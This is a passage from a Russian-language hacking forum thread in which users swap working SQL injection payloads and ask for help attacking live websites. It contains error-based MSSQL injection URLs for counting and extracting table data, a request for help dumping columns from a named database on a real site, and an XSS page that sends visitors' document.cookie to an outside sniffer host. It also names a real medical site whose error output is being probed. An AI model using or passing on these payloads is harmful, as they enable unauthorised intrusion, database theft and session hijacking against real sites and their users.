Спасибо Большое! +10 тебе! Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring(): Code: SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES); В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B. Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/
тогда запрось типа: Code: http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+count('Email')+from+tbl_Members))-- будеть Code: http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members))); правильно я понял?
Нужно так: http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'%2BCAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых. Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: . Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички. Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы? всем пионерам спасибо
Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером. Code: <html> <body> <form name="xss" action="http://***.com.ua//index.jsp" method="post"> <input type="hidden" name="com" value="***"> <input type="hidden" name="***" value='1000"> <script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'> <script language=javascript>xss.submit()</script> </form> </body> </html> Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации.
Кхм, подскажите пожалуйста, как посчитать кол-во таблиц при PostgreSQL inj из information_schema.tables? В гугле что-то нифига нету PS: Тот же самый вопрос и про кол-во колонок в табле и про кол-во данных в табле Спасибо Стандартные count(*) не работают что-то в этой мегатеме https://forum.antichat.ru/threadnav35599-1-10.html живу уже два часа, там есть всё - как то, как это, а как посчитать - нету
сегодня чисто случайно искал информацию(по медицине) и нашел такое: __http://www.cardiosite.ru/doctors/registration.aspx здесь ошибка такая: Code: Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately. Compiler Error Message: JS1241: Type 'ALP.Data.SqlData.QueryS' could not be found, is an assembly reference missing? Source Error: [No relevant source lines] Source File: D:\sites\cardio\_controls\users\user-registration-solvay.ascx Line: 184 можно смело понять, что там IIS (ну и с MSSQL) И хотел узнать - это что за ошибка и ошибка чего? IIS или SQL ? И как можно (или вобше можно) это использовать ? P.S. Кстати, нажимая Show Detailed Compiler Output: можно получить еще кучу информации. там введены таблицы, да ? (UserIP, tbUserLastName, tbUserFirstName и т.д.)
2 l1ght: Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы отправил в личку
Pashkela count(*) отлично работает везде, уверен, что ты забываешь о приведении типов, из-за этого и проблемы PS. Я бы дал линк, но ты-же начнёшь там свою чудопрогу тестить, и будет на нормальном сайте жопа в логах
2 jokester: POST|GET|PROXY и жопа и в логах? Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку
